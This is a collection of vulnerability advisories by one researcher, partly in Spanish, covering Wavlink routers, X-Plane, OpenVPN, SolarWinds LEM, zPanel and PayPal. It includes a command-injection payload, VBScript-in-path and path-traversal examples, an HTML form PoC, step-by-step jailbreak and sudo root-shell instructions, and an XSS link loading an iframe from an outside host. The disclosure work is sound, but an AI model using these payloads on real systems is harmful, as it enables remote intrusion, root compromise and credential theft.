Wavlink Multiple AP Products: Unauthenticated Remote Root Command Execution

 

BACKGROUND

WAVLINK brand is rising rapidly in market of wireless network and comprehensive IT peripherals.

DESCRIPTION

Several Wavlink products are affected by a vulnerability that may allow remote unauthenticated users to execute arbitrary commands as root on Wavlink devices. The user input is not properly sanitized which allows command injection via the "key" parameter in a login request. It has been tested on Wavlink WN575A4 and WN579X3 devices, but other products may be affected.

PROOF OF CONCEPT 

1. CVE-2020-13117 - Remote Root Command Execution via the "key" parameter

  

When the user logins, the "key" parameter value is injected in a command execution without filtering, before checking the authentication. The following picture shows a snippet of the vulnerable code:

 

Due to the lack of sanitization, it is possible to escape from the "echo" command context and execute arbitrary commands as root. For example, the following payload would execute the "whoami" command:

';`whoami;`;#

 

It is important to note that the device registers itself on the network as "wifi.wavlink.com" to make the setup process easier as the user does not have to search the assigned IP, but also allowing to trigger the vulnerability from a remote website without knowing the device IP.

There is a payload size limitation, but it can be bypassed splitting the command into several requests to execute more complex commands.

The following file includes a poc exploit to download and execute a file when visiting a malicious website:

https://drive.google.com/file/d/1k5Q_0cW5WOR4AY1IrkztD8COAwPpEu9O/view?usp=sharing

TIMELINE

April 15, 2020: Contact with Wavlink 
February 6, 2021: After several tries to contact them without success, advisory published.

DISCOVERED BY

Jose Antonio Pérez Piedra

X-Plane < 11.41 Remote Command Execution

BACKGROUND

X-Plane is a flight simulator produced by Laminar Research. X-Plane can be used professionally with the correct license, or used personally.

DESCRIPTION

X-Plane <= 11.40 is affected by two vulnerabilities that may allow remote users to execute arbitrary commands on systems running the simulator. Some networking interface commands, needed to interact with 3rd party apps, are not properly sanitized which allows memory corruption and path traversal/arbitrary file write. The affected interface is enabled by default and listens on port 49000 UDP. The protocol documentation is public. These vulnerabilities could be chained to execute arbitrary system commands.

PROOF OF CONCEPT

1. CVE-2019-19605 - Arbitrary Memory Write via crafted network packets, which could cause a denial of service or arbitrary code execution. 

•     Command affected: ACFN
•     Parameter affected: acfn_p

- The affected parameter is used as array index without range checks, allowing controlled out of bounds memory write.

2. CVE-2019-19606 - Multiple improper path validations, which could allow reading and writing files from/to arbitrary paths (or leaking OS credentials to a remote system).

• Command affected: SIMO
• Parameter affected: Second parameter (SIMO_path)  

• Command affected: ACFN
• Parameter affected: Second parameter (acfn_path_rel)    

• Command affected: OBJN
• Parameter affected: Second parameter (path)

  - Allows arbitrary file read/write outside of the X-Plane installation folder. Several commands do not filter correctly the data input.

   - It is also important to note that on Windows machines, when opening a file starting with "\\" or "//" followed by an ip or hostname, most IO APIs will try to connect to it as a SMB(445 port) shared folder by default, leaking the user domaingroup, username and hash password to the malicious server. If the port is closed and the WebClient service is running it will try to access the file via WEBDAV (port 80). 

    Other commands and parameters may be affected in same way.

   The "ACFN" and "SIMO" commands can be used to leak the hashed credentials and execute arbitrary command/code on every system reboot.

• Load an aircraft from a shared folder with arbitrary VBScript code in the path, via "ACFN" command. For example: 

\\\\192.168.1.101/TMP/<script language="VBScript">CreateObject("Wscript.Shell").Run "calc.exe"</script>/final.acf

•  Write a situation file with the "SIMO" command to the user's startup folder with ".hta" extension, gaining execution of VBScript code, stored as aircraft path inside the file. For example:

test.txt/../../../../../../../../../../../../Users/<LEAKED_USER>/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/test.hta

VIDEO
The next video shows a Kali virtual machine exploiting these vulnerabilities to execute commands (a calculator) on a machine running Windows 10 and X-Plane 11.40.

SOLUTION

Improve the parameter filtering and range checks on command parameters.

TIMELINE
November 5, 2019: Contact with X-Plane Team
November 5, 2019: X-Plane confirms the vulnerabilities.
December 6, 2019: X-Plane releases patched version 11.41r1
March 28, 2020: Advisory published.

DISCOVERED BY
Jose Antonio Pérez Piedra

OpenVPN: Remote Information Disclosure and Denial Of Service (CVE-2018-7544)

BACKGROUND

OpenVPN is an open-source software application that implements virtual private network (VPN) techniques for creating secure point-to-point or site-to-site connections in routed or bridged configurations and remote access facilities. It uses a custom security protocol[9] that utilizes SSL/TLS for key exchange. It is capable of traversing network address translators (NATs) and firewalls.

DESCRIPTION

A cross-protocol issue was discovered in the management interface in OpenVPN through 2.4.4.
Remote attackers can interact with the OpenVPN service by triggering actions in a web browser to execute management commands, which could be used (for example) to leak sensitive information or silently crash the service.

PROOF OF CONCEPT
The management interface will try to execute every line as a command, so it is possible to send a multipart/form-data to keep a clean line with a controlled input which will be successfully executed as a command by the management interface. I've used the "signal SIGTERM" command to force the termination of the client, disconnecting the VPN without user notification, but any other command can be used. It is also possible to leak sensitive information like network interfaces configuration.

Here is the trivial PoC:

<html>
<body>
<form action="http://localhost:23000" method="post" enctype="multipart/form-data">
<textarea name="poc"> signal SIGTERM</textarea>
<input type="submit" value="Send">
</form>
</body>
</html>

The port can be brute forced (via multiple XMLHTTPRequest for example).

LIMITATIONS

Only one client can be connected to the management interface at same time.

SOLUTION
Force the user to set a password or to include a specific parameter (--management_insecure) if the interface is configured to use TCP without password.

VENDOR RESPONSE
Won't fix. They added some information to the man page recommending unix sockets instead of TCP.

DISCOVERED BY
Jose Antonio Pérez Piedra

SolarWinds LEM: SSH Jailbreak and Privilege Escalation

BACKGROUND

SolarWinds LEM (or SIEM) is a log management software for security, compliance, and troubleshooting. Log & Event Manager includes rules and reports for standards like HIPAA, PCI-DSS, SOX, GLBA, NCUA, NERC-CIP, DISA-STIG, and more.

DESCRIPTION

SolarWinds LEM <= 6.3 is affected by two vulnerabilities that allow remote authenticated users to escape from sandbox and elevate privileges to root. The vulnerable interface exposes some internal tools that could be used to escape from jail and execute arbitrary commands on the system. A second flaw related with improper permissions allows users to execute commands as root. 

PROOF OF CONCEPT
The affected resource is the custom SSH interface. It is a limited shell which only allows specific management actions, like modify network interfaces or view the server status. Due to weak isolation, it is possible to escape from this interface and launch a system shell without restrictions.

1. CVE-2017-5199 - SolarWinds SIEM authenticated custom shell Jailbreak and command execution

- Login through SSH (port 32022 by deafult)
- Acess "appliance" section.
- Enter "editbanner" command. A "nano" editor will be shown.
- Press "F5" key and then <CTRL+T>. This combination will open a file explorer.
- Navigate to "/usr/local/contego/scripts/" and open "mgrconfig.pl". This is the logon shell script and is writable, but can't save to the right file jet.
- Press <ALT+F>, then <CTRL+R>. It will enable multibuffer and ask for a file to insert into. Put "/usr/local/contego/scripts/mgrconfig.pl".
- When loaded, search for "sub do_main" with <CTRL+W>.
- Insert 'system("/bin/bash");' line, just after 'print "cmc>";'.
- Finally, save the file with <CTRL+O> and ENTER.
- Exit SSH and login again.
- When logged in, a bash shell will be shown.



2. CVE-2017-5198 - SolarWinds SIEM incorrect permissions on management scripts allows privilege escalation 

- Once logged into bash shell, check available "sudo" commands: sudo -l

- Due to incorrect permissions, it is possible to edit the content of several scripts which are allowed to run as sudo.

- I've choosen "/usr/local/contego/scripts/hostname.sh". Open it with nano, delete the content and just put "/bin/bash -i". Save it with <CTRL+O>.

- Execute "sudo /usr/local/contego/scripts/hostname.sh" to get a root shell.

BUSINESS IMPACT

An attacker can execute arbitrary commands as root, which leads in a total machine compromise.

LIMITATIONS

The last published version (6.3.1) is affected by the sandbox escape vulnerability, but the privilege escalation was patched by setting correct permissions on the affected files. Anyway, it was verified that is still possible to escalate privileges due to outdated system kernel.

SOLUTION

Improve the isolation on the custom SSH interface and set correct permissions on all sensitive files to prevent unwanted access or modification.

It is also recommended to upgrade the system kernel to prevent privilege escalation issues. The SolarWinds team has confirmed that they are working on it.

TIMELINE
January 6, 2017: CVE assigned CVE-2017-5198 and CVE-2017-5199
January 6, 2017: Contact with SolarWinds Team
January 10, 2017: SolarWinds confirms the vulnerability. They said that are working in a fix.
January 14, 2017: SolarWinds confirms the patch and public release date (February 15, 2017).
March 23, 2017: Advisory published.

DISCOVERED BY
Jose Antonio Pérez Piedra

zPanel 10.1.x - Remote Root Vulnerability

zPanel es un panel de administración de hosting, pensado para ser la alternativa gratuita a cPanel, es bastante completo y dispone de una interfaz sencilla y completa.

La historia de este exploit comenzó con el conocido bug del binario zsudo descubierto en la versión 10.0.2, publicado por Zenny en fulldisclosure, se trata de una vulnerabilidad de elevación de privilegios por ejecución de comandos como superusuario.

A día de hoy, la última versión del sistema (10.1.0) sigue siendo vulnerable al mismo fallo. Además en el mismo binario existe un bug de buffer overflow que tiene un papel secundario debido al fallo de ejecución de comandos, más fácil de explotar, pero no menos importante.

Reporté el fallo al bugtrack de zPanel (bugs.zpanelcp.com) el día 6/11/2013, casi tres meses después, el día 30/1/2014 recibí contestación.

A grandes rasgos el desarrollador me hizo entender que al no proporcionar acceso SSH a los clientes el fallo no podía ser explotado. Esto ya me parece un craso error, no se puede basar la seguridad de un sistema informático en la confianza, como quedará demostrado a continuación.

Al recibir esa contestación me puse a indagar en busca de algo que permitiese ejecutar el binario zsudo, tras encadenar varios bugs y errores de configuración resultó en un exploit que puede ser utilizado para obtener acceso como root al sistema sin necesidad de estar autentificado en el panel.

El primer fallo reside en la librería pChart2 2.1.3 incluida en el panel. Utiliza una versión para la cual han publicado recientemente un fallo de revelación de archivos (http://www.exploit-db.com/exploits/31173/). El problema está en los ficheros de ejemplo que trae dicha librería.

Esto permite acceder al archivo de configuración de zpanel que almacena la clave de root de MySQL. El directorio que almacena las librerías debería estar restringido al público para evitar llamadas directas a ellas, cosa que no ocurre en zpanel.

A continuación y con la clave de root de MySQL, podemos acceder via phpMyAdmin que se encuentra en la ruta del panel http://localhost/etc/apps/phpmyadmin/, que tampoco restringe la entrada y puede ser accedido por cualquiera sin estar autentificado previamente.

Una vez dentro se puede localizar la ruta donde está instalado el panel mediante una simple consulta SQL. Esta ruta dispone de permisos 777 por defecto en todos los archivos, lo que permite modificar cualquier fichero dentro de esta carpeta o lo que más interesa para el desarrollo de este exploit, crearlos.

MySQL dispone de sentencias para volcar información de la base de datos en archivos (INTO OUTFILE), esto junto a los permisos máximos que otorga el usuario root, abre la puerta a la subida de una shell en php al directorio de zPanel.

Una vez llegados a este punto el sistema está comprometido, aunque solo dispondríamos de permisos limitados al usuario www-data. Aquí es donde entra la elevación de privilegios, que no sería posible si el programa zsudo no fuera vulnerable.

Las directivas de seguridad de PHP como disable_functions podrían mitigar este ataque bloqueando funciones potencialmente dañinas, que permiten la ejecución de comandos como puede ser passthru(), exec(), system(), popen(), etc... pero zPanel permite su utilización.

Para conseguir la elevación de privilegios, se puede abusar de zsudo. Primero se modifica el fichero de configuración del servicio SSH para permitir el acceso remoto como root, una vez conseguido esto solo es necesario cambiar la password de root y entrar con esa clave a través de SSH.

Esta es la ruta que he seguido para conseguir permisos de superusuario, pero aquí puede haber muchas variantes: conexión inversa como root, creación de superusuario, etc.

En resumen se ha demostrado que no se puede confiar en un sistema infalible con una única capa de seguridad, ya que tarde o temprano habrá una mínima brecha, que si se complementa con fallos públicos no parcheados puede comprometer el servidor por completo.

Además de estos fallos, he reportado otros bugs menores:
- XSS (https://github.com/zpanel/zpanelx/pull/106)
- XSS (https://github.com/zpanel/zpanelx/pull/104)
- Information disclosure (http://bugs.zpanelcp.com/view.php?id=704)

A continuación dejo el seguimiento de la vulnerabilidad realizada por el equipo de zPanel y el exploit que da acceso root al servidor.

Timeline:
- 06/11/2013: Inyección de comandos y buffer overflow en zsudo reportado.
- 30/01/2014: Respuesta del desarrollador: No se considera explotable y no liberará ningún parche.
- 31/01/2014: Exploit reportado
- 01/02/2014: Zsudo reescrito por mi en github (https://github.com/zpanel/zpanelx/pull/97)
- 01/03/2014: Zpanel lanza la versión 10.1.1

ACTUALIZACIÓN (27/10/2015): 
Exploit publicado: http://pastebin.com/y5Pf4Yms


Vulnerabilidad descubierta por Jose Antonio Pérez
japp{at}0xlabs{dotz}com

Paypal - Cross Site Scripting

Uno de los parámetros del enlace que proporciona Paypal para realizar pagos es vulnerable a XSS (Cross Site Scripting), que podría permitir el robo de la sesiones a clientes autentificados en Paypal.

Si este tipo de fallo ya de por sí es grave en una empresa de estas características, donde está localizado el bug incrementa enormemente las posibilidades de éxito ante ataques tipo Phising, un atacante podría cambiar el formulario de login incluido en esta página fácilmente por uno propio y obtener las credenciales del cliente, como su email y contraseña. Simplemente modificando el enlace de botón de pago proporcionado por Paypal.

La única limitación que tiene el bug es el tamaño máximo de la cadena a insertar, 23 caracteres, esto puede ser evadido fácilmente mediante acortadores de URL por ejemplo, siempre que trabajen bajo SSL.

https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=UPWVULJWYUVT6&on0=%3Ciframe%20src%3D%2f%2fnimb.cc%2f%3Easdasd&os0=1208171032&on1=asd&os1=NUEVA ALMACEN DE BARRIO CENTRICO EN BUENOS AIRES INTERESADA EN ABASTECIMIENTO DE PRODUCTOS KOSHER\"\'